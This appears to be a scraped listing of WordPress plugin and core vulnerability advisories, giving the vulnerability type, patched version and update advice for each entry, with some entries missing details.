Plugin: WooFramework Tweaks

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: Page Builder: Pagelayer – Drag and Drop website builder

Vulnerability: Missing Authorization to Stored Cross-Site Scripting
Patched Version: 1.7.7
Recommended Action: Update to version 1.7.7, or a newer patched version

Plugin: Themify Shortcodes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.0.8
Recommended Action: Update to version 2.0.8, or a newer patched version

Plugin: Image Hover Effects Ultimate (Image Gallery, Effects, Lightbox, Comparison or Magnifier)

Vulnerability: Reflected Cross-Site Scripting via effects
Patched Version: 9.7.1
Recommended Action: Update to version 9.7.1, or a newer patched version

Plugin: Rich Widget

Plugin: WP-Members Membership Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 3.1.8
Recommended Action: Update to version 3.1.8, or a newer patched version

Plugin: WooCommerce

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 5.2.0
Recommended Action: Update to version 5.2.0, or a newer patched version

Plugin: Zeno Font Resizer

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.8.0
Recommended Action: Update to version 1.8.0, or a newer patched version

Plugin: Nested Pages

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.1.21
Recommended Action: Update to version 3.1.21, or a newer patched version

Plugin: bSuite

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 5 alpha 3
Recommended Action: Update to version 5 alpha 3, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: Awesome Support – WordPress HelpDesk & Support Plugin

Vulnerability: Missing Authorization via wpas_edit_reply_ajax()
Patched Version: 6.1.5
Recommended Action: Update to version 6.1.5, or a newer patched version

Core: WordPress

Vulnerability: Stored Cross-Site Scripting via File Uploads
Patched Version: 3.7.28
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.28, 3.8.28, 3.9.26, 4.0.25, 4.1.25, 4.2.22, 4.3.18, 4.4.17, 4.5.16, 4.6.13, 4.7.12, 4.8.8, 4.9.9, 5.0.1

Plugin: Contact Form and Calls To Action by vcita

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.7.0
Recommended Action: Update to version 2.7.0, or a newer patched version

Plugin: Photo Gallery, Images, Slider in Rbs Image Gallery

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcodes
Patched Version: 3.2.13
Recommended Action: Update to version 3.2.13, or a newer patched version

Plugin: WPB Show Core

Plugin: Oceanwp sticky header

Vulnerability: Cross-Site Request Forgery to Plugin Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Download Manager

Vulnerability: Authenticated (Admin+) Path Traversal
Patched Version: 3.2.55
Recommended Action: Update to version 3.2.55, or a newer patched version

Plugin: BMI BMR Calculator

Plugin: Quiz Maker

Vulnerability: Content Spoofing
Patched Version: 6.3.9.5
Recommended Action: Update to version 6.3.9.5, or a newer patched version

Plugin: Link Library

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.9.12.30
Recommended Action: Update to version 5.9.12.30, or a newer patched version

Plugin: ThirstyAffiliates – Affiliate Links, Link Branding, Link Tracking & Marketing Plugin

Vulnerability: Authorization Bypass and Cross-Site Request Forgery
Patched Version: 3.10.5
Recommended Action: Update to version 3.10.5, or a newer patched version

Plugin: Archivist – Custom Archive Templates

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.7.5
Recommended Action: Update to version 1.7.5, or a newer patched version

Plugin: MailerLite – Signup forms (official)

Vulnerability: Signup forms <= 1.5.3
Patched Version: 1.5.4
Recommended Action: Update to version 1.5.4, or a newer patched version

Plugin: WordPress Online Booking and Scheduling Plugin – Bookly

Vulnerability: Cross-Site Scripting
Patched Version: 14.6
Recommended Action: Update to version 14.6, or a newer patched version

Core: WordPress

Vulnerability: Shortcode Execution in User Generated Content
Patched Version: 5.9.7
Recommended Action: Update to one of the following versions, or a newer patched version: 5.9.7, 6.0.5, 6.1.3, 6.2.2

Plugin: JS Job Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.7
Recommended Action: Update to version 1.0.7, or a newer patched version

Plugin: Crazy Bone

Plugin: WIP Custom Login

Vulnerability: Missing Authorization
Patched Version: 1.2.8
Recommended Action: Update to version 1.2.8, or a newer patched version

Plugin: Gift Up Gift Cards for WordPress and WooCommerce

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.20.2
Recommended Action: Update to version 2.20.2, or a newer patched version

Plugin: Simple YouTube Responsive

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: Social Rocket – Social Sharing Plugin

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.3.3
Recommended Action: Update to version 1.3.3, or a newer patched version

Plugin: Books & Papers

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 0.20220219
Recommended Action: Update to version 0.20220219, or a newer patched version

Plugin: Wp-Hide

Vulnerability: Missing Authorization to Settings Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Consultant

Plugin: Quiz Maker

Vulnerability: Missing Authorization
Patched Version: 6.5.1.2
Recommended Action: Update to version 6.5.1.2, or a newer patched version

Plugin: WP Page Widget

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.0
Recommended Action: Update to version 4.0, or a newer patched version

Plugin: Dynamically Register Sidebars

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Loginizer

Vulnerability: Reflected Cross-Site Scripting via ‘limit_session[count]’
Patched Version: 1.7.9
Recommended Action: Update to version 1.7.9, or a newer patched version

Plugin: Dynamic Visibility for Elementor

Vulnerability: Missing Authorization to Authenticated(Subscriber+) Post Visibility Modification
Patched Version: 5.0.6
Recommended Action: Update to version 5.0.6, or a newer patched version

Plugin: Insert Pages

Vulnerability: Contributor+ Stored Cross-Site Scripting
Patched Version: 3.7.0
Recommended Action: Update to version 3.7.0, or a newer patched version

Plugin: Better Messages – Live Chat for WordPress, BuddyPress, PeepSo, Ultimate Member, BuddyBoss

Vulnerability: Authorization Bypass to Blocking Control Bypass
Patched Version: 1.9.10.69
Recommended Action: Update to version 1.9.10.69, or a newer patched version

Plugin: POEditor

Vulnerability: Cross-Site Request Forgery
Patched Version: 0.9.5
Recommended Action: Update to version 0.9.5, or a newer patched version

Plugin: MultiParcels Shipping For WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.15.2
Recommended Action: Update to version 1.15.2, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.9.9
Recommended Action: Update to version 2.9.9, or a newer patched version

Plugin: Comments – wpDiscuz

Vulnerability: Missing Authorization via AJAX actions
Patched Version: 7.6.4
Recommended Action: Update to version 7.6.4, or a newer patched version

Plugin: Convertful – Your Ultimate On-Site Conversion Tool

Vulnerability: Missing Authorization via add_woo_coupon
Patched Version: 2.6
Recommended Action: Update to version 2.6, or a newer patched version

Plugin: phpinfo() WP

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.0
Recommended Action: Update to version 5.0, or a newer patched version

Plugin: Popup Maker – Boost Sales, Conversions, Optins, Subscribers with the Ultimate WP Popups Builder

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.16.11
Recommended Action: Update to version 1.16.11, or a newer patched version

Plugin: Bootstrap Shortcodes

Plugin: Tajer

Plugin: HashThemes Demo Importer

Vulnerability: Missing Authorization to Database Wipe
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: Modern Events Calendar Lite

Vulnerability: Reflected Cross-Site Scripting via current_month_divider parameter
Patched Version: 6.1.5
Recommended Action: Update to version 6.1.5, or a newer patched version

Plugin: WP-RSS-Spreadshirt-3DCube-Gallery

Plugin: Spam protection, Anti-Spam, FireWall by CleanTalk

Vulnerability: Cross-Site Request Forgery
Patched Version: 6.21
Recommended Action: Update to version 6.21, or a newer patched version

Plugin: WP-EMail

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: 2.67.3
Recommended Action: Update to version 2.67.3, or a newer patched version

Plugin: Photo Gallery by Ays – Responsive Image Gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.4.4
Recommended Action: Update to version 4.4.4, or a newer patched version

Plugin: CHP Ads Block Detector

Vulnerability: Missing Authorization to Plugin Settings Update
Patched Version: 3.9.8
Recommended Action: Update to version 3.9.8, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Cross-Site Scripting
Patched Version: 1.9.8
Recommended Action: Update to version 1.9.8, or a newer patched version

Plugin: HT Portfolio – WordPress Portfolio Plugin for Elementor

Vulnerability: Cross-Site Request Forgery to Arbitrary Plugin Activation
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: Scripts Organizer

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: Abandoned Cart Lite for WooCommerce

Vulnerability: Improper Authorization via wcal_preview_emails
Patched Version: 5.16.1
Recommended Action: Update to version 5.16.1, or a newer patched version

Plugin: Participants Database

Vulnerability: SQL Injection
Patched Version: 1.9.5.6
Recommended Action: Update to version 1.9.5.6, or a newer patched version

Plugin: WP Tools Increase Maximum Limits, Repair, Server PHP Info, Javascript errors, File Permissions, Transients, Error Log

Vulnerability: Missing Authorization leading to Authenticated (Subscriber+) Authorization Bypass
Patched Version: 3.43
Recommended Action: Update to version 3.43, or a newer patched version

Plugin: WPML

Vulnerability: Missing Authorization to Translation Job Status Change
Patched Version: 4.5.11
Recommended Action: Update to version 4.5.11, or a newer patched version

Plugin: WORDPRESS VIDEO GALLERY

Vulnerability: Cross-Site Scripting
Patched Version: 2.6
Recommended Action: Update to version 2.6, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.3.5
Recommended Action: Update to version 6.3.5, or a newer patched version

Plugin: All in One SEO – Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.3.7
Recommended Action: Update to version 2.3.7, or a newer patched version

Plugin: wordpress-form-manager

Vulnerability: Authenticated Remote Command Execution
Patched Version: 1.7.3
Recommended Action: Update to version 1.7.3, or a newer patched version

Plugin: Cookie Monster

Plugin: Advanced Dynamic Pricing for WooCommerce

Vulnerability: Cross-Site Request Forgery via migrateProductOnlyToCommon function
Patched Version: 4.1.6
Recommended Action: Update to version 4.1.6, or a newer patched version

Plugin: WP-T-Wap

Plugin: WordPress Infinite Scroll – Ajax Load More

Vulnerability: Authenticated (Admin+) Arbitrary File Read via Directory Traversal
Patched Version: 5.5.4.1
Recommended Action: Update to version 5.5.4.1, or a newer patched version

Plugin: lasTunes

Plugin: Facebook Page Photo Gallery

Plugin: MC4WP: Mailchimp for WordPress

Vulnerability: Missing Authorization via listen
Patched Version: 4.9.10
Recommended Action: Update to version 4.9.10, or a newer patched version

Plugin: TNIT Filter Gallery Plugin

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 0.0.7
Recommended Action: Update to version 0.0.7, or a newer patched version

Plugin: Related Posts for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.8.2
Recommended Action: Update to version 1.8.2, or a newer patched version

Plugin: WP Custom Author URL

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Plugin: 10Web Booster – Website speed optimization, Cache & Page Speed optimizer

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2.12.23
Recommended Action: Update to version 2.12.23, or a newer patched version

Plugin: Product Catalog Simple

Vulnerability: Sensitive Information Exposure via Product CSV
Patched Version: 1.7.7
Recommended Action: Update to version 1.7.7, or a newer patched version

Plugin: Sharebar

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Custom Field For WP Job Manager

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: WP Meta SEO

Vulnerability: Missing Authorization in ‘checkAllCategoryInSitemap’
Patched Version: 4.5.4
Recommended Action: Update to version 4.5.4, or a newer patched version

Plugin: Visual Website Collaboration, Feedback & Project Management – Atarim

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: 3.13
Recommended Action: Update to version 3.13, or a newer patched version

Plugin: Download Monitor

Vulnerability: Authenticated Directory Traversal to Sensitive Information Exposure
Patched Version: 4.7.3
Recommended Action: Update to version 4.7.3, or a newer patched version

Plugin: Auto Upload Images

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.3.1
Recommended Action: Update to version 3.3.1, or a newer patched version

Plugin: Auto More Tag

Plugin: SupportFlow

Vulnerability: Cross-Site Scripting via a ticket excerpt.
Patched Version: 0.7
Recommended Action: Update to version 0.7, or a newer patched version

Plugin: MashShare – Social Media Share Buttons, Social Share Icons

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.8.4
Recommended Action: Update to version 3.8.4, or a newer patched version

Plugin: Slider Revolution

Vulnerability: Authenticated (Administrator+) Arbitrary File Upload
Patched Version: 6.6.13
Recommended Action: Update to version 6.6.13, or a newer patched version

Plugin: LifterLMS – WP LMS for eLearning, Online Courses, & Quizzes

Vulnerability: Stored Cross-Site Scripting via Import
Patched Version: 3.35.0
Recommended Action: Update to version 3.35.0, or a newer patched version

Core: WordPress

Vulnerability: Arbitrary File Upload
Patched Version: 2.5.2
Recommended Action: Update to version 2.5.2, or a newer patched version

Plugin: Shortcode Addons- with Visual Composer, Divi, Beaver Builder and Elementor Extension

Vulnerability: Unauthenticated Arbitrary Options Update
Patched Version: 3.0.3
Recommended Action: Update to version 3.0.3, or a newer patched version

Plugin: Under Construction

Vulnerability: Cross-Site Request Forgery via admin_action_install_weglot
Patched Version: 3.97
Recommended Action: Update to version 3.97, or a newer patched version

Plugin: Cosmetsy Core

Plugin: Portfolio Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.05
Recommended Action: Update to version 1.05, or a newer patched version

Plugin: Ray Enterprise Translation

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.9
Recommended Action: Update to version 1.1.9, or a newer patched version

Plugin: AdPush

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 1.44
Recommended Action: Update to version 1.44, or a newer patched version

Plugin: Social Share, Social Login and Social Comments Plugin – Super Socializer

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 7.13.30
Recommended Action: Update to version 7.13.30, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: World Travel Information

Plugin: 301 Redirects – Easy Redirect Manager

Vulnerability: Easy Redirect Manager <= 2.40
Patched Version: 2.45
Recommended Action: Update to version 2.45, or a newer patched version

Plugin: Visual Form Builder

Vulnerability: Unauthenticated Information Disclosure
Patched Version: 3.0.6
Recommended Action: Update to version 3.0.6, or a newer patched version

Plugin: Woocommerce Follow-ups

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.9.50
Recommended Action: Update to version 4.9.50, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via html_tag
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: Database for Contact Form 7, WPforms, Elementor forms

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: Master Slider – Responsive Touch Slider

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.7.5
Recommended Action: Update to version 3.7.5, or a newer patched version

Plugin: Job Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 0.7.25
Recommended Action: Update to version 0.7.25, or a newer patched version

Core: WordPress

Vulnerability: Security Hardening
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Image Compressor & Optimizer – iLoveIMG

Vulnerability: iLoveIMG <= 1.0.5
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Plugin: LiveSync for WordPress

Plugin: Profile Builder Pro

Vulnerability: Authenticated Blind SQL Injection
Patched Version: 3.3.3
Recommended Action: Update to version 3.3.3, or a newer patched version

Plugin: Bellows Accordion Menu

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: Ultimate Affiliate Pro WordPress Plugin

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 4.0
Recommended Action: Update to version 4.0, or a newer patched version

Plugin: HTML5 Maps

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.7.1.5
Recommended Action: Update to version 1.7.1.5, or a newer patched version

Plugin: Floating Tweets

Plugin: Dashboard Widgets Suite

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.2.2
Recommended Action: Update to version 3.2.2, or a newer patched version

Plugin: Word Balloon

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 4.19.3
Recommended Action: Update to version 4.19.3, or a newer patched version

Plugin: Customer Reviews Collector for WooCommerce

Vulnerability: No subtitle
Patched Version: 4.0
Recommended Action: Update to version 4.0, or a newer patched version

Plugin: WebARX

Vulnerability: Firewall Bypass
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Resume Submissions & Job Postings

Vulnerability: Arbitrary File Upload
Patched Version: 2.5.2
Recommended Action: Update to version 2.5.2, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Path Traversal
Patched Version: 2.1.9
Recommended Action: Update to version 2.1.9, or a newer patched version

Plugin: Controlled Admin Access

Vulnerability: Improper Access Control & Privilege Escalation
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: Bulk Datetime Change

Vulnerability: Missing Authorisation
Patched Version: 1.12
Recommended Action: Update to version 1.12, or a newer patched version

Plugin: WP Super Cache

Vulnerability: Unauthenticated Cache Poisoning
Patched Version: 1.9
Recommended Action: Update to version 1.9, or a newer patched version

Core: WordPress

Vulnerability: Remote Code Execution
Patched Version: 3.7.28
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.28, 3.8.28, 3.9.26, 4.0.25, 4.1.25, 4.2.22, 4.3.18, 4.4.17, 4.5.16, 4.6.13, 4.7.12, 4.8.8, 4.9.9, 5.0.1

Plugin: Activity Log – Monitor & Record User Changes

Vulnerability: CSV Injection
Patched Version: 2.8.4
Recommended Action: Update to version 2.8.4, or a newer patched version

Plugin: Sublanguage

Vulnerability: Missing Authorization
Patched Version: 2.10
Recommended Action: Update to version 2.10, or a newer patched version

Plugin: Votecount For Balatarin

Plugin: Post Index

Plugin: Block Bad Bots and Stop Bad Bots Crawlers and Spiders and Anti Spam Protection

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.67
Recommended Action: Update to version 6.67, or a newer patched version

Plugin: Simple visitor stat

Plugin: Jetpack – WP Security, Backup, Speed, & Growth

Vulnerability: Cross-Site Scripting
Patched Version: 7.0.1
Recommended Action: Update to version 7.0.1, or a newer patched version

Plugin: Easy Digital Downloads – eCommerce Payments and Subscriptions made easy

Vulnerability: SQL Injection
Patched Version: 3.1.0.4
Recommended Action: Update to version 3.1.0.4, or a newer patched version

Plugin: iMember360is

Vulnerability: 3.9.001
Patched Version: 3.9.002
Recommended Action: Update to version 3.9.002, or a newer patched version

Plugin: Garee’s Flickr Feed

Plugin: Add Multiple Marker

Plugin: Build 5 Star Reviews on Google Reviews, Yelp, Facebook… easily and risk-free | RRatingg

Vulnerability: Unauthenticated SQL Injection
Patched Version: 1.2.54
Recommended Action: Update to version 1.2.54, or a newer patched version

Plugin: bbPress

Vulnerability: Unauthenticated Blind SQL Injection
Patched Version: 2.5.13
Recommended Action: Update to version 2.5.13, or a newer patched version

Plugin: Uncanny Automator – Easy Automation, Integration, Webhooks & Workflow Builder Plugin

Vulnerability: Sensitive Information Exposure via Log File
Patched Version: 5.1.0.3
Recommended Action: Update to version 5.1.0.3, or a newer patched version

Plugin: fmoblog

Plugin: Import and export users and customers

Vulnerability: Authenticated (Subscriber+) CSV Injection
Patched Version: 1.20.5
Recommended Action: Update to version 1.20.5, or a newer patched version

Plugin: Pop-Up Chop Chop

Plugin: Simple Tracking

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: Easiest Funnel Builder For WordPress & WooCommerce by WPFunnels

Vulnerability: Insecure Direct Object Reference
Patched Version: 2.7.16
Recommended Action: Update to version 2.7.16, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.21.3
Recommended Action: Update to version 2.21.3, or a newer patched version

Plugin: Feed Them Social – Social Media Feeds, Video, and Photo Galleries

Vulnerability: Unauthenticated PHAR Deserialization
Patched Version: 2.9.8.6
Recommended Action: Update to version 2.9.8.6, or a newer patched version

Plugin: Slideshow Gallery LITE

Vulnerability: Cross-Site Scripting
Patched Version: 1.6.9
Recommended Action: Update to version 1.6.9, or a newer patched version

Plugin: WP Directory Kit

Vulnerability: Missing Authorization to Plugin Settings Change/Delete, Demo Import, Directory Kit Deletion via wdk_admin_action
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: BuddyForms Moderation ( Former: Review Logic )

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.4.17
Recommended Action: Update to version 1.4.17, or a newer patched version

Plugin: Download Theme

Vulnerability: Cross-Site Request Forgery via dtwap_download()
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Plotly

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Plugin: JobBoardWP – Job Board Listings and Submissions

Vulnerability: Missing Authorization to Job Posting Manipulation
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Visual Form Builder

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 3.0.4
Recommended Action: Update to version 3.0.4, or a newer patched version

Plugin: Video Sidebar Widgets

Core: WordPress MU

Vulnerability: Sensitive Information Disclosure
Patched Version: 2.8.1
Recommended Action: Update to version 2.8.1, or a newer patched version

Plugin: WP Social AutoConnect

Vulnerability: Cross-Site Request Forgery via jfb_admin_page
Patched Version: 4.6.2
Recommended Action: Update to version 4.6.2, or a newer patched version

Plugin: TCD Google Maps

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: HTML5 Lyrics Karaoke Player

Plugin: WPCargo Track & Trace

Vulnerability: Admin+ Stored Cross Site Scripting
Patched Version: 6.9.5
Recommended Action: Update to version 6.9.5, or a newer patched version

Plugin: FV Flowplayer Video Player

Vulnerability: SQL Injection
Patched Version: 7.5.18.727
Recommended Action: Update to version 7.5.18.727, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 7.3.5
Recommended Action: Update to version 7.3.5, or a newer patched version

Plugin: Slider Hero with Video Background, Animation

Vulnerability: SQL Injection
Patched Version: 8.2.7
Recommended Action: Update to version 8.2.7, or a newer patched version

Plugin: Photospace Gallery

Plugin: EventPrime – Events Calendar, Bookings and Tickets

Vulnerability: Authenticated(Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.3.3
Recommended Action: Update to version 3.3.3, or a newer patched version

Plugin: Social Share Buttons & Analytics Plugin – GetSocial.io

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.4
Recommended Action: Update to version 4.4, or a newer patched version

Plugin: CP Contact Form with PayPal

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: Welcart e-Commerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.4
Recommended Action: Update to version 2.2.4, or a newer patched version

Plugin: Mapping multiple URLs redirect same page

Plugin: Store Locator for WordPress with Google Maps – LotsOfLocales

Vulnerability: 3.11
Patched Version: 3.12
Recommended Action: Update to version 3.12, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Arbitrary File Upload
Patched Version: 2.0.22
Recommended Action: Update to version 2.0.22, or a newer patched version

Plugin: Direct Checkout – Quick View – Buy Now For WooCommerce

Vulnerability: Authenticated (Shop manager+) Stored Cross-Site Scripting via Custom CSS Code
Patched Version: 1.5.9
Recommended Action: Update to version 1.5.9, or a newer patched version

Plugin: Wp photo text slider 50

Vulnerability: Authenticated (Subscriber+) SQL Injection via Shortcode
Patched Version: 8.1
Recommended Action: Update to version 8.1, or a newer patched version

Plugin: WP ULike – All-in-One Engagement Toolkit

Vulnerability: Missing Authorization
Patched Version: 3.2
Recommended Action: Update to version 3.2, or a newer patched version

Plugin: BackWPup – WordPress Backup & Restore Plugin

Vulnerability: Remote File Inclusion
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: BadgeOS

Plugin: Easy Property Listings

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.4
Recommended Action: Update to version 3.4, or a newer patched version

Plugin: FAQs Manager

Plugin: OAuth client Single Sign On for WordPress ( OAuth 2.0 SSO )

Vulnerability: Cross-Site Scripting
Patched Version: 3.0.2
Recommended Action: Update to version 3.0.2, or a newer patched version

Plugin: Email Users

Vulnerability: Reflected Cross Site Scripting
Patched Version: 4.7.6
Recommended Action: Update to version 4.7.6, or a newer patched version

Plugin: MonsterInsights – Google Analytics Dashboard for WordPress (Website Stats Made Easy)

Vulnerability: Cross-Site Scripting
Patched Version: 5.1.3
Recommended Action: Update to version 5.1.3, or a newer patched version

Plugin: Duplicate Page or Post

Vulnerability: Missing Authorization to Stored Cross-Site Scripting
Patched Version: 1.5.1
Recommended Action: Update to version 1.5.1, or a newer patched version

Plugin: SEMA API

Vulnerability: SQL Injection
Patched Version: 4.02
Recommended Action: Update to version 4.02, or a newer patched version

Plugin: Registration Forms – User Registration Forms, Invitation-Based Registrations, Front-end User Profile, Login Form & Content Restriction

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.15
Recommended Action: Update to version 2.0.15, or a newer patched version

Plugin: Broadcast Live Video – Live Streaming : HTML5, WebRTC, HLS, RTSP, RTMP

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.27
Recommended Action: Update to version 4.27, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via title_size Parameter
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: WPC Product Bundles for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 7.3.2
Recommended Action: Update to version 7.3.2, or a newer patched version

Plugin: Fontiran

Vulnerability: Missing Authorization via fi_add_rule and fi_delete_webfont_php
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Welcart e-Commerce

Vulnerability: Authenticated (Subscriber+) Information Disclosure and PHAR deserialization
Patched Version: 2.8.6
Recommended Action: Update to version 2.8.6, or a newer patched version

Plugin: HUSKY – Products Filter Professional for WooCommerce

Vulnerability: Authenticated (Admin+) PHP Object Injection
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: WooCommerce

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.5.2
Recommended Action: Update to version 3.5.2, or a newer patched version

Plugin: UserPro – Community and User Profile WordPress Plugin

Vulnerability: Authentication Bypass
Patched Version: 4.9.17.1
Recommended Action: Update to version 4.9.17.1, or a newer patched version

Plugin: WordPress Comments Import & Export

Vulnerability: CSV Injection
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Database for Contact Form 7, WPforms, Elementor forms

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via vx-entries shortcode
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: Photo Gallery Slideshow & Masonry Tiled Gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.14
